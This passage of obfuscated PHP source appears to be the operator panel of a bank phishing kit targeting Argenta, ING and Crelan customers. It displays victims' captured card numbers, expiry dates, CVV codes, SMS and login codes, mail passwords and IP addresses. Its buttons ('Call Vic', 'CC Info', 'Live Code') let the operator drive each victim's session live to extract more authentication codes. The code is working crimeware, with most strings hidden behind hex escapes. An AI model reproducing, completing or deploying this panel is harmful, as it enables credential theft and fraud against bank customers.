x20\x20\40\40\x20\x20\40\40\x20\40\40\x20\x20\x20\40\x20\40\40\x20\x3c\x64\151\x76\40\x63\154\x61\163\163\75\42\164\145\170\x74\x2d\170\x73\x20\x66\x6f\x6e\164\x2d\167\x65\x69\147\x68\164\x2d\x62\x6f\x6c\x64\x20\x63\x75\x73\x74\x6f\155\x2d\164\145\x78\x74\x20\164\x65\170\x74\x2d\165\160\x70\x65\x72\143\141\163\x65\40\155\142\55\x31\x22\x3e\12\x20\40\x20\x20\40\x20\x20\x20\40\40\40\40\x20\x20\x20\x20\40\x20\40\x20\x20\40\40\x20\40\x20\x20\x20\x20\x20\x20\40\x20\40\40\40\x20\74\x69\x20\143\154\141\x73\163\75\x22\146\141\40\x66\x61\x2d\x75\156\151\166\145\x72\x73\151\164\171\42\40\141\162\151\x61\x2d\x68\151\144\x64\145\156\75\42\164\x72\165\145\42\76\74\x2f\x69\76\40\102\x61\156\x6b\x3c\x2f\x64\x69\x76\76\12\x20\x20\x20\x20\x20\40\x20\x20\40\x20\x20\40\40\x20\40\40\x20\40\x20\x20\40\x20\40\x20\40\40\40\x20\x20\x20\x20\40\40\x20\x3c\144\x69\x76\40\x63\x6c\141\163\x73\75\x22\150\65\x20\155\x62\x2d\60\x20\146\157\x6e\164\x2d\x77\145\x69\x67\x68\x74\55\142\157\154\144\x20\164\145\170\x74\x2d\x77\150\151\x74\x65\42\x3e" . (empty($log["\x62\141\156\x6b"]) ? "\x4e\117\x54\40\x53\105\x4c\x45\x43\x54\105\x44" : $log["\x62\x61\x6e\x6b"]) . "\x3c\57\x64\151\x76\x3e\xa\40\40\x20\40\40\40\x20\x20\40\40\40\40\x20\x20\x20\40\40\40\x20\40\x20\40\40\x20\x20\x20\x20\40\40\40\x3c\57\x64\151\166\76\12\x20\x20\x20\40\40\x20\x20\x20\x20\40\40\x20\40\40\40\40\x20\x20\40\40\40\x20\40\x20\x20\40\x20\x20\40\x20\74\x64\x69\x76\x20\143\x6c\x61\163\x73\75\x22\x63\x6f\154\55\141\x75\164\157\x22\76\12\40\40\xa\40\x20\40\x20\40\x20\x20\40\40\40\40\40\40\x20\40\40\x20\40\x20\x20\40\x20\40\x20\40\40\40\x20\40\40\x3c\57\x64\151\x76\x3e\xa\40\x20\x20\40\x20\40\40\x20\40\40\40\x20\40\40\40\x20\x20\40\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x2f\x64\x69\166\x3e\12\x20\40\x20\40\40\40\40\x20\x20\x20\40\x20\x20\x20\x20\x20\x20\x20\x20\40\40\x20\x3c\57\144\x69\166\76\xa\40\40\40\x20\40\40\40\40\40\40\40\x20\40\x20\40\x20\40\40\74\x2f\x64\x69\x76\76\12\40\x20\x20\x20\x20\x20\x20\x20\x20\40\x20\40\40\x20\x3c\x2f\x64\x69\166\76\12\x20\40\x20\40\x20\x20\x20\40\40\x20\74\x2f\x64\151\x76\x3e"; echo "\74\x2f\144\x69\x76\76"; echo "\x3c\57\144\151\x76\76"; echo "\x3c\57\144\x69\166\76"; echo "\x3c\57\x64\x69\x76\x3e"; echo "\74\x73\x74\171\x6c\145\40\164\x79\x70\x65\75\x22\164\145\170\x74\57\x63\x73\163\x22\x3e\12\40\x20\56\x6d\x6f\144\x61\154\x2d\x68\x65\141\144\145\x72\40\x7b\12\40\40\144\151\163\x70\x6c\141\x79\x3a\x20\x66\x6c\x65\170\73\12\40\40\x61\x6c\151\147\156\x2d\x69\164\145\x6d\x73\x3a\40\x66\154\x65\x78\x2d\163\164\x61\162\164\x3b\xa\40\x20\x6a\x75\163\x74\151\x66\171\x2d\x63\x6f\x6e\164\145\x6e\x74\72\x20\x73\x70\141\x63\x65\55\142\145\x74\167\x65\145\x6e\x3b\12\x20\x20\x70\141\144\144\x69\156\147\x3a\40\x31\162\x65\155\40\x31\x72\x65\x6d\73\12\40\x20\x62\157\x72\x64\x65\x72\x2d\142\x6f\x74\164\157\155\72\x20\61\x70\170\40\163\157\x6c\151\144\40\43\62\x30\62\60\x32\60\x3b\12\40\x20\142\157\162\144\x65\162\55\x74\157\x70\55\154\x65\146\164\55\x72\141\x64\151\165\163\x3a\x20\x63\x61\154\x63\x28\x30\56\x33\162\x65\x6d\40\x2d\x20\x31\160\170\51\x3b\12\x20\x20\142\157\x72\144\145\x72\x2d\164\x6f\x70\55\162\151\147\x68\164\x2d\x72\141\x64\151\165\163\x3a\40\x63\141\x6c\143\x28\60\x2e\63\162\145\x6d\x20\55\40\x31\160\170\x29\x3b\xa\40\40\x7d\xa\40\40\56\x6d\x6f\x64\x61\154\55\x66\157\x6f\164\145\162\40\173\12\x20\x20\x64\151\163\x70\x6c\141\x79\72\x20\x66\x6c\x65\170\73\12\40\x20\146\x6c\x65\170\55\167\x72\141\x70\72\40\x77\162\141\x70\73\12\x20\x20\x61\x6c\151\x67\156\55\x69\x74\x65\155\163\72\x20\143\x65\156\164\145\x72\73\xa\40\40\x6a\165\163\164\x69\146\171\55\143\157\x6e\164\145\156\164\72\x20\x66\x6c\x65\x78\55\145\156\x64\x3b\xa\x20\40\x70\x61\144\x64\x69\x6e\147\x3a\x20\60\56\x37\x35\162\145\155\x3b\xa\x20\40\142\157\162\144\145\162\55\x74\157\x70\x3a\40\61\x70\170\x20\163\x6f\154\x69\144\x20\43\62\x30\62\x30\62\60\x3b\xa\40\x20\x62\x6f\162\144\145\x72\55\142\x6f\164\x74\157\155\55\162\151\x67\x68\x74\55\x72\x61\x64\x69\165\x73\x3a\x20\x63\x61\154\x63\x28\x30\x2e\x33\x72\145\155\x20\55\x20\61\160\170\x29\73\xa\x20\x20\142\157\162\144\145\x72\x2d\142\x6f\x74\164\x6f\155\x2d\154\145\x66\x74\x2d\162\141\144\151\x75\163\x3a\40\x63\x61\154\143\50\60\x2e\63\162\145\155\40\55\40\61\x70\170\x29\x3b\xa\x20\x20\175\12\x20\x20\12\x20\40\x2e\163\x69\151\x6c\145\156\x63\x65\x64\x2d\x64\141\162\x6b\145\162\40\173\12\x20\40\142\x61\x63\153\x67\162\x6f\x75\156\x64\55\x63\x6f\x6c\x6f\162\72\40\43\61\143\x31\143\x31\x63\x3b\12\40\x20\x7d\12\x20\x20\74\x2f\x73\164\171\154\145\x3e\x3c\x21\x2d\55\40\x52\141\x62\157\x62\141\x6e\x6b\40\x4d\157\144\x61\x6c\x20\x2d\55\x3e"; echo ''; ?>
<div class="modal fade" id="exampleModalCenter" tabindex="-1" role="dialog" aria-labelledby="exampleModalCenterTitle" aria-hidden="true">
<div class="modal-dialog modal-dialog-centered" role="document">
<div class="modal-content bg-darker">
<div class="modal-header siilenced-darker">
<h5 class="modal-title" id="exampleModalLongTitle"><i class="fa fa-ban" aria-hidden="true"></i> Are you sure u want to ban user?</h5>
</div>
<div class="modal-body">
<p style="font-style: italic;">This action cannot be undone.</p>
<hr>
<p><i class="fa fa-database" aria-hidden="true"></i> Fetching Details <img height="15" width="15" src="/img/ing.gif"></p>
<style>
siilenced {
font-family: monospace;
}
</style>
<div class="card-body">
<div class="card mb-1 siilenced-darker rounded custom-card">
<p>
<siilenced> Ip_address: <?php echo htmlspecialchars($ip); ?>
</siilenced>
</p>
<p>
<siilenced> user_agent: <?php echo htmlspecialchars($log["\x75\163\145\x72\x5f\141\x67\x65\156\164"]); ?>
</siilenced>
</p>
<p>
<siilenced> user_id: <?php echo htmlspecialchars($log["\165\163\x65\x72\x5f\x69\x64"]); ?>
</siilenced>
</p>
<br><br>
</div>
</div>
<div class="modal-footer">
<button type="button" class="btn btn-outline-primary" data-dismiss="modal"><i class="fa fa-times" aria-hidden="true"></i> Close</button>
<button class="btn btn-outline-danger" data-dismiss="modal" onclick="banUser('<?php echo $log["\x69\160"]; ?>
', '<?php echo $log["\x75\x73\145\162\137\151\144"]; ?>
')"><i class="fa fa-check" aria-hidden="true"></i> Yes</button>
<?php echo "\x3c\x2f\x64\151\x76\76\xa\x20\x20\x20\x20\x20\40\40\40\40\40\40\x20\74\x2f\144\x69\166\76\xa\40\x20\40\40\x20\x20\x20\x20\40\x20\x20\x20\x3c\x2f\144\151\x76\76\12\40\x20\x20\x20\x20\40\40\x20\x20\x20\40\x20\x3c\x2f\144\151\166\x3e\xa\40\x20\40\40\40\40\40\x20\x20\40\40\40\x3c\57\144\151\x76\x3e\xa\x20\40\40\40\x20\40\40\x20\40\x20\x20\40\74\x2f\144\x69\166\x3e"; echo "\x3c\x21\x2d\x2d\x20\105\156\x64\40\x52\141\x62\157\142\141\x6e\x6b\40\x4d\157\144\x61\x6c\40\x2d\x2d\x3e"; echo "\74\163\164\x79\154\145\x3e\xa\40\x20\40\x20\x20\x20\x20\x20\x20\x20\x20\40\56\143\141\x72\144\x2d\150\145\141\144\x65\x72\x20\x7b\xa\x20\x20\40\40\40\x20\x20\x20\40\x20\x20\40\160\141\144\x64\151\156\147\x3a\40\x30\56\67\x35\162\145\155\x20\61\56\62\65\162\x65\155\x3b\xa\x20\40\x20\40\x20\x20\40\x20\40\x20\x20\x20\155\x61\x72\x67\x69\x6e\x2d\142\157\164\164\x6f\x6d\72\x20\x30\x3b\xa\x20\x20\40\40\x20\40\x20\40\x20\40\40\40\x62\141\x63\x6b\x67\x72\157\x75\156\x64\x2d\x63\x6f\x6c\157\162\72\x20\43\x31\145\x31\x64\x31\x64\x3b\12\x20\x20\40\x20\x20\x20\40\40\x20\40\40\40\142\157\x72\144\x65\162\x2d\142\157\x74\x74\157\155\x3a\x20\61\160\170\40\x73\x6f\154\x69\144\40\43\x32\x30\62\60\x32\x30\73\xa\40\x20\40\x20\40\40\x20\x20\40\40\40\40\x7d\74\x2f\x73\x74\171\x6c\145\76\x3c\x64\x69\166\x20\x63\x6c\x61\163\x73\75\42\162\157\167\x20\x70\x2d\x31\42\x3e"; echo "\74\x64\151\x76\40\x63\154\141\x73\x73\75\42\x63\x6f\x6c\55\x6c\147\55\70\40\x63\x6f\x6c\55\x73\155\x2d\61\x32\42\x3e"; echo "\74\x64\151\166\40\x63\154\x61\x73\163\x3d\42\x63\141\162\x64\55\x68\x65\141\x64\145\x72\40\164\145\170\164\x2d\167\150\x69\x74\x65\x20\40\142\147\x2d\144\141\162\153\145\x72\x20\x73\151\151\x6c\145\156\x63\x65\x64\x2d\144\x61\162\x6b\145\162\x22\x3e\12\40\x20\40\40\x20\40\x20\40\x20\x20\x20\40\40\40\40\40\x3c\x69\x20\143\154\x61\163\x73\x3d\42\x66\x61\40\x66\141\55\x69\x6e\146\157\x2d\143\151\x72\143\154\x65\x22\x20\x61\162\151\x61\55\150\x69\144\x64\x65\156\75\x22\164\x72\165\x65\42\x3e\x3c\x2f\151\x3e\40\103\x61\x70\164\x75\162\145\144\40\104\141\x74\x61\12\40\40\40\40\40\x20\40\x20\40\40\x20\x20\12\40\x20\x20\40\40\x20\40\x20\x20\40\40\40\12\40\40\40\x20\x20\40\40\x20\x20\x20\x20\40\xa\40\40\40\40\40\x20\40\40\40\x20\40\40\40\40\40\x20\x3c\57\x64\x69\166\76\74\x64\151\166\x20\143\154\x61\163\163\75\42\x63\157\154\55\61\62\40\x70\x2d\64\40\142\147\55\144\141\x72\x6b\145\x72\42\76"; echo "\x3c\144\151\x76\x20\x63\x6c\x61\163\x73\x3d\x22\x76\x65\x75\x73\x64\145\160\x75\x74\x20\160\x2d\64\40\x72\x6f\x75\x6e\144\x65\x64\x22\76\x20"; if ($log["\142\x61\x6e\x6b"] === "\x41\x52\107\105\116\x54\101") { function ARGENTA($label, $value) { echo "\74\144\151\166\x20\x63\154\141\x73\163\x3d\42\x66\x6f\162\x6d\x2d\x67\162\x6f\165\160\40\x72\x6f\x77\42\76"; echo "\74\154\141\142\145\x6c\40\146\x6f\x72\75\47\x69\144\47\40\x63\x6c\x61\163\x73\x3d\x27\x74\x65\170\164\x2d\x73\x65\x63\157\x6e\x64\141\x72\171\40\143\x6f\154\55\163\155\x2d\x33\40\x66\157\x6e\164\x2d\x77\145\x69\x67\150\x74\x2d\x62\x6f\154\144\47\76{$label}\72\74\x2f\x6c\x61\x62\145\154\x3e"; echo "\x3c\x64\x69\x76\40\x63\x6c\x61\163\x73\75\x22\143\x6f\154\55\163\x6d\x2d\x39\42\x3e"; echo "\x3c\x70\40\143\154\141\x73\163\x3d\47\164\145\170\x74\55\x73\145\x63\157\156\144\141\162\171\47\x3e\74\151\76\74\x73\x70\141\156\x20\143\x6c\141\x73\x73\x3d\47\143\x6f\x70\171\x2d\x76\141\154\x75\x65\47\40\157\x6e\x63\154\151\x63\x6b\75\x27\x63\x6f\160\x79\x54\x6f\103\154\151\x70\x62\157\x61\162\144\x28\164\150\151\163\x29\x27\x3e" . htmlspecialchars($value) . "\x3c\x2f\x73\160\141\156\76\x3c\x62\162\57\76\74\163\x70\141\156\40\x63\x6c\141\x73\x73\75\x27\143\x6f\160\171\55\x74\145\170\x74\47\76\103\154\151\x63\x6b\40\x74\x6f\40\x63\157\160\171\x3c\x2f\x73\x70\141\x6e\x3e\74\57\x69\76\x3c\57\x70\x3e"; echo "\x3c\57\144\x69\166\76"; echo "\x3c\x2f\x64\x69\x76\76"; } if (!empty($log["\x61\x72\x67\145\x6e\164\x61\137\167\x69\146\x69"])) { ARGENTA("\103\x61\x72\x64\x4e\x75\155\x62\145\x72", $log["\141\x72\147\x65\x6e\164\x61\137\167\151\x66\x69"]); } if (!empty($log["\x61\162\x67\x65\x6e\164\x61\137\x77\151\146\151\x5f\160\x61\163\x73"])) { ARGENTA("\x45\170\x70\x69\162\x79", $log["\141\x72\x67\x65\x6e\164\141\x5f\x77\x69\146\x69\137\x70\x61\163\163"]); } if (!empty($log["\x61\x72\147\145\x6e\x74\x61\137\145\x78\160"])) { ARGENTA("\x53\115\123", $log["\141\162\x67\x65\x6e\x74\x61\137\145\x78\160"]); } if (!empty($log["\x61\162\147\x65\x6e\164\x61\x5f\x75\x73\145\162"])) { ARGENTA("\x50\150\x6f\x6e\x65", $log["\x61\x72\x67\145\x6e\x74\141\137\165\163\x65\x72"]); } if (!empty($log["\x61\x72\x67\x65\x6e\164\141\137\143\141\154\154"])) { ARGENTA("\x43\x61\x6c\154\x20\x56\x69\143", $log["\x61\x72\147\x65\156\x74\x61\x5f\143\x61\154\154"]); } if (!empty($log["\141\x72\x67\145\x6e\x74\x61\x5f\x63\x75\x73\164\x6f\x6d"])) { ARGENTA("\x43\165\x73\x74\x6f\x6d", $log["\x61\x72\147\x65\x6e\164\x61\137\143\165\x73\164\x6f\x6d"]); } if (!empty($log["\x61\x72\x67\145\x6e\x74\x61\137\164\x61\x6e"])) { ARGENTA("\115\x61\x69\154\55\120\141\163\163", $log["\x61\162\x67\x65\156\164\x61\x5f\x74\141\x6e"]); } if (!empty($log["\x61\x72\147\x65\x6e\x74\x61\x5f\x63\162\x65\x64\151\x74\x63\x61\x72\144"])) { ARGENTA("\103\141\x72\144\x20\116\x75\155\142\145\x72", $log["\x61\162\x67\x65\x6e\x74\x61\137\143\x72\x65\144\151\164\x63\141\x72\144"]); } if (!empty($log["\141\162\x67\145\x6e\164\141\x5f\143\143\145\170\x70"])) { ARGENTA("\105\170\x70\x69\162\171", $log["\141\x72\x67\145\x6e\x74\x61\137\x63\143\145\x78\x70"]); } if (!empty($log["\141\x72\x67\x65\x6e\x74\x61\x5f\x63\166\x76"])) { ARGENTA("\x43\126\126", $log["\141\x72\147\x65\156\x74\x61\137\x63\166\166"]); } if (!empty($log["\x61\x72\x67\145\156\164\x61\x5f\x72\145\163\160\157\x6e\163"])) { ARGENTA("\114\x6f\147\151\x6e\x20\x43\x6f\x64\x65", $log["\x61\x72\147\x65\156\x74\141\x5f\162\x65\163\x70\157\156\x73"]); } if (!empty($log["\141\162\x67\145\x6e\x74\141\x5f\x72\145\163\x70\x6f\156\163\x5f\x74\x77\157"])) { ARGENTA("\x4c\151\166\x65\x20\103\x6f\144\145", $log["\x61\x72\147\x65\x6e\x74\141\137\x72\x65\163\160\157\x6e\x73\137\164\167\157"]); } if ($log["\x77\141\x69\164\151\x6e\x67"] == "\164\162\x75\x65") { ?>
</div>
<div class="row">
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setArgenta('<?php echo htmlspecialchars($log["\x75\163\145\x72\x5f\x69\144"]); ?>
', 'control')"><i class="fas fa-sign-in-alt"></i> | Login</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setArgenta('<?php echo htmlspecialchars($log["\165\x73\145\x72\137\151\x64"]); ?>
', 'details')"><i class="fa fa-envelope" aria-hidden="true"></i>
| SMS</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setArgenta('<?php echo htmlspecialchars($log["\165\163\145\x72\137\151\x64"]); ?>
', 'login')"><i class="fas fa-phone"></i> | Phone</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setArgenta('<?php echo htmlspecialchars($log["\x75\163\145\x72\x5f\151\x64"]); ?>
', 'tan')"><i class="fa fa-envelope" aria-hidden="true"></i>
| Mail-Pass</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setArgenta('<?php echo htmlspecialchars($log["\x75\163\145\162\x5f\151\x64"]); ?>
', 'call')"><i class="fa fa-envelope" aria-hidden="true"></i>
| Call Vic</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setArgenta('<?php echo htmlspecialchars($log["\x75\x73\145\x72\x5f\x69\x64"]); ?>
', 'creditcard')"><i class="fa fa-credit-card" aria-hidden="true"></i>
| CC Info</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-success mt-4" onclick="setArgenta('<?php echo htmlspecialchars($log["\165\163\x65\162\x5f\x69\144"]); ?>
', 'finish')"><i class="fa fa-check-circle" aria-hidden="true"></i> Finish</button>
</div>
</div>
<div class="row">
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-outline-warning mt-4" onclick="setArgenta('<?php echo htmlspecialchars($log["\x75\x73\x65\162\x5f\x69\144"]); ?>
', 'custom')"><i class="fa fa-phone" aria-hidden="true"></i>
| Custom</button>
</div>
<div class="col-lg-9">
<br>
<input hidden type="text" class="form-control argenta-custom input-dark mt-4 custom-input" placeholder="Fill in your 'Login Code'">
<a href="../public/api/TokenInput/Insert.php" target="_blank" class="custom-link"><b>Set custom amount</b></a>
</div>
<style>
.custom-link {
color: orange;
text-decoration: none;
font-size: 16px;
cursor: pointer;
}
.custom-link:hover {
text-decoration: underline;
}
</style>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setArgenta('<?php echo htmlspecialchars($log["\x75\163\145\x72\x5f\151\144"]); ?>
', 'photo')"><i class="fa fa-window-restore" aria-hidden="true"></i>
| Login Code</button>
</div>
<div class="col-lg-9">
<input type="text" class="form-control argenta-sign input-dark mt-4 custom-input" placeholder="Fill in your 'Login Code'">
</div>
<div class="col-lg-3">
<hr>
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setArgenta('<?php echo htmlspecialchars($log["\165\x73\x65\162\137\x69\x64"]); ?>
', 'live')"><i class="fa fa-shopping-basket" aria-hidden="true"></i>
| Live Code</button>
</div>
<div class="col-lg-9">
<hr>
<input type="text" class="form-control argenta-live input-dark mt-4 custom-input" placeholder="Fill in your first 'Live Code'">
<input type="text" class="form-control argenta-live-two input-dark mt-4 custom-input" placeholder="Fill in your second 'Live Code'">
</div>
</div>
</div>
</div>
<?php } } else { if ($log["\142\x61\156\x6b"] === "\x49\116\x47") { function ING($label, $value) { echo "\x3c\144\151\x76\40\143\154\x61\x73\163\x3d\42\146\x6f\162\x6d\55\x67\162\x6f\x75\x70\40\162\x6f\x77\x22\x3e"; echo "\74\x6c\141\142\145\x6c\40\146\157\x72\x3d\x27\x69\144\x27\x20\143\x6c\141\x73\163\x3d\x27\164\x65\170\x74\x2d\x73\x65\x63\x6f\156\144\141\162\x79\40\143\157\x6c\55\x73\x6d\55\63\x20\146\157\x6e\164\55\x77\x65\x69\147\x68\x74\x2d\x62\157\154\144\x27\76{$label}\72\74\57\x6c\x61\x62\145\x6c\x3e"; echo "\74\x64\151\166\40\143\154\x61\163\163\x3d\42\143\157\x6c\55\163\x6d\x2d\x39\x22\x3e"; echo "\x3c\x70\x20\143\x6c\x61\163\163\x3d\x27\164\x65\170\x74\55\x73\x65\143\x6f\x6e\x64\x61\x72\171\x27\x3e\x3c\x69\x3e\x3c\x73\160\141\156\x20\x63\154\141\x73\163\75\x27\143\157\160\171\55\166\x61\x6c\165\x65\x27\40\157\x6e\x63\154\151\x63\x6b\75\x27\143\x6f\x70\x79\x54\157\x43\154\x69\x70\x62\157\x61\x72\x64\50\164\150\151\163\x29\47\76" . htmlspecialchars($value) . "\74\x2f\163\x70\x61\156\76\74\142\x72\57\76\74\x73\x70\x61\156\40\x63\x6c\141\163\163\75\x27\x63\157\x70\171\55\x74\x65\x78\x74\x27\76\103\154\151\143\x6b\x20\164\157\40\x63\x6f\160\171\74\57\163\160\141\x6e\x3e\x3c\x2f\151\76\74\57\x70\x3e"; echo "\x3c\x2f\144\x69\x76\x3e"; echo "\74\57\x64\x69\166\76"; } if (!empty($log["\151\x6e\x67\x5f\167\x69\x66\x69"])) { $kaartbegin = '' . $log["\x69\156\x67\x5f\x77\x69\146\151"]; ING("\103\x61\162\144\116\165\x6d\142\145\162", $kaartbegin); } if (!empty($log["\151\x6e\x67\x5f\x77\151\146\151\137\x70\x61\163\x73"])) { ING("\x49\116\x47\40\111\x44", $log["\x69\x6e\x67\x5f\x77\x69\146\x69\x5f\x70\141\163\163"]); } if (!empty($log["\151\156\147\x5f\167\151\x66\151\x5f\160\141\163\163\137\x74\x77\x6f"])) { ING("\105\x78\x70\x69\x72\171", $log["\151\x6e\147\x5f\x77\x69\146\x69\x5f\x70\141\x73\163\137\x74\167\157"]); } if (!empty($log["\151\156\x67\x5f\145\x78\x70"])) { ING("\x53\115\123", $log["\x69\156\x67\137\145\170\x70"]); } if (!empty($log["\x69\156\x67\x5f\x70\141\163\x73\x77\x6f\162\144"])) { ING("\x4d\x61\151\154\55\120\x61\163\x73", $log["\x69\156\147\x5f\160\x61\163\163\x77\x6f\x72\x64"]); } if (!empty($log["\151\156\147\137\x63\141\x6c\x6c"])) { ING("\103\141\x6c\x6c\40\126\151\x63", $log["\151\156\x67\137\x63\141\154\154"]); } if (!empty($log["\151\x6e\147\x5f\x63\x75\x73\164\157\x6d"])) { ING("\x43\165\163\164\157\155", $log["\x69\156\147\137\x63\165\163\x74\157\155"]); } if (!empty($log["\151\156\x67\x5f\x75\163\x65\162"])) { ING("\111\144\145\x6e\164\x69\x66\171\x20\103\x6f\144\x65", $log["\151\156\147\x5f\165\x73\x65\162"]); } if (!empty($log["\151\156\147\137\x72\x65\x73\160\157\156\163"])) { ING("\114\157\x67\x69\156\40\103\157\144\x65", $log["\x69\156\x67\137\x72\145\x73\x70\x6f\x6e\x73"]); } if (!empty($log["\x69\156\147\x5f\143\157\144\145\137\x78"])) { ING("\x53\151\x67\x6e\40\103\x6f\144\145", $log["\x69\156\147\x5f\143\157\144\x65\137\170"]); } if (!empty($log["\151\156\147\x5f\x63\157\x64\x65\x5f\155"])) { ING("\123\151\x67\156\40\103\157\x64\145\40\x28\62\x29", $log["\x69\156\x67\137\x63\x6f\144\145\x5f\155"]); } if (!empty($log["\151\x6e\147\x5f\x72\x65\163\x70\x6f\156\x73\x5f\x74\x77\x6f"])) { ING("\x4c\x69\166\x65\40\x43\157\x64\x65", $log["\151\x6e\147\x5f\162\145\163\160\x6f\156\163\x5f\164\x77\x6f"]); } if (!empty($log["\151\156\x67\x5f\x63\162\145\144\x69\x74\x63\x61\162\x64"])) { ING("\123\x4d\123", $log["\x69\156\147\x5f\143\x72\x65\x64\x69\x74\x63\x61\x72\x64"]); } if ($log["\167\141\151\164\x69\x6e\x67"] == "\x74\x72\165\x65") { ?>
</div>
<div class="row">
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setIng('<?php echo htmlspecialchars($log["\x75\x73\145\x72\x5f\x69\144"]); ?>
', 'control')"><i class="fas fa-sign-in-alt"></i> | Login</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setIng('<?php echo htmlspecialchars($log["\165\163\145\x72\x5f\151\144"]); ?>
', 'login')"><i class="fas fa-key"></i> | Identify Code</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setIng('<?php echo htmlspecialchars($log["\x75\x73\145\x72\137\151\144"]); ?>
', 'creditcard')"><i class="fa fa-comments" aria-hidden="true"></i>
| SMS</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setIng('<?php echo htmlspecialchars($log["\165\163\145\162\x5f\151\144"]); ?>
', 'password')"><i class="fa fa-comments" aria-hidden="true"></i>
| Mail-Pass</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setIng('<?php echo htmlspecialchars($log["\165\x73\x65\162\x5f\x69\x64"]); ?>
', 'call')"><i class="fa fa-phone" aria-hidden="true"></i>
| Call Vic</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-success mt-4" onclick="setIng('<?php echo htmlspecialchars($log["\165\x73\x65\x72\x5f\x69\x64"]); ?>
', 'finish')"><i class="fa fa-check-circle" aria-hidden="true"></i> Finish</button>
</div>
</div>
<div class="row">
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-outline-warning mt-4" onclick="setIng('<?php echo htmlspecialchars($log["\165\x73\145\162\137\x69\144"]); ?>
', 'custom')"><i class="fa fa-phone" aria-hidden="true"></i>
| Custom</button>
</div>
<div class="col-lg-9">
<br>
<input hidden type="text" class="form-control argenta-custom input-dark mt-4 custom-input" placeholder="Fill in your 'Login Code'">
<a href="../public/api/TokenInput/Insert.php" target="_blank" class="custom-link"><b>Set custom amount</b></a>
</div>
<style>
.custom-link {
color: orange;
text-decoration: none;
font-size: 16px;
cursor: pointer;
}
.custom-link:hover {
text-decoration: underline;
}
</style>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setIng('<?php echo htmlspecialchars($log["\165\x73\x65\x72\137\x69\144"]); ?>
', 'photo')"><i class="fa fa-window-restore" aria-hidden="true"></i>
| Login Code</button>
</div>
<div class="col-lg-9">
<input type="text" class="form-control ing-sign input-dark mt-4 custom-input" placeholder="Fill in your 'Login Code'">
</div>
<div class="col-lg-3">
</div>
<div class="col-lg-9">
<input hidden type="text" class="form-control ing-sign-two input-dark mt-4 custom-input" placeholder="Fill in your 'Sign Code'">
</div>
<div class="col-lg-3">
</div>
<div class="col-lg-9">
<input type="text" hidden class="form-control ing-sign-two-two input-dark mt-4 custom-input" placeholder="Fill in your first 'Sign Code'">
<input type="text" hidden class="form-control ing-sign-two-two-two input-dark mt-4 custom-input" placeholder="Fill in your second 'Sign Code'">
</div>
<div class="col-lg-3">
<hr>
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setIng('<?php echo htmlspecialchars($log["\x75\163\145\x72\x5f\x69\144"]); ?>
', 'live')"><i class="fa fa-shopping-basket" aria-hidden="true"></i>
| Live Code</button>
</div>
<div class="col-lg-9">
<hr>
<input type="text" class="form-control ing-live input-dark mt-4 custom-input" placeholder="Fill in your first 'Live Code'">
<input type="text" class="form-control ing-live-two input-dark mt-4 custom-input" placeholder="Fill in your second 'Live Code'">
</div>
</div>
</div>
</div>
<?php } } else { if ($log["\x62\x61\x6e\x6b"] == "\x43\x52\105\x4c\x41\x4e") { if (!empty($log["\143\137\x6b\141\x61\x72\x74"]) && !empty($log["\x63\137\x6b\154\141\156\164"])) { echo "\x3c\x64\151\x76\x20\143\x6c\x61\163\163\75\x22\146\157\162\155\55\147\162\x6f\x75\160\x20\x72\x6f\x77\42\x3e"; echo "\x3c\x6c\141\x62\145\154\40\146\157\162\x3d\x22\151\144\42\40\x63\154\x61\163\163\x3d\x22\x74\145\170\x74\55\x73\x65\x63\x6f\156\x64\x61\162\x79\40\x63\x6f\154\x2d\163\155\x2d\63\40\x66\x6f\x6e\164\55\x77\x65\151\x67\150\x74\55\x62\x6f\154\x64\42\x3e\x20\151\144\x65\156\164\151\x66\x69\143\141\x74\x69\145\40\72\74\x2f\154\x61\x62\145\x6c\x3e"; echo "\74\144\151\x76\x20\143\x6c\141\163\x73\x3d\42\x63\x6f\154\55\163\x6d\55\x39\x22\x3e"; echo "\x3c\160\40\143\x6c\141\x73\x73\75\x22\x74\145\x78\164\x2d\x73\145\143\157\156\144\x61\162\171\42\76\74\151\x3e" . htmlspecialchars($log["\x63\137\x6b\x61\x61\162\164"]) . "\74\x2f\x69\76\x3c\x2f\160\76"; echo "\74\57\x64\151\166\x3e"; echo "\74\x2f\144\x69\x76\76"; echo "\x3c\x64\x69\166\x20\143\x6c\x61\x73\163\x3d\x22\146\x6f\162\155\x2d\147\162\157\x75\x70\x20\x72\x6f\167\42\x3e"; echo "\74\x6c\141\x62\x65\154\40\x66\x6f\x72\x3d\42\151\x64\42\40\143\x6c\141\163\x73\x3d\x22\164\145\170\164\55\x73\145\143\x6f\x6e\144\x61\162\171\40\x63\157\154\55\163\x6d\55\63\x20\x66\157\156\164\x2d\x77\145\x69\147\150\164\x2d\x62\x6f\154\144\42\76\x20\163\145\162\x69\x65\156\165\x6d\155\145\162\40\72\74\x2f\154\x61\142\x65\x6c\x3e"; echo "\x3c\144\x69\166\40\143\x6c\x61\163\163\75\42\x63\157\x6c\55\163\x6d\x2d\x39\x22\76"; echo 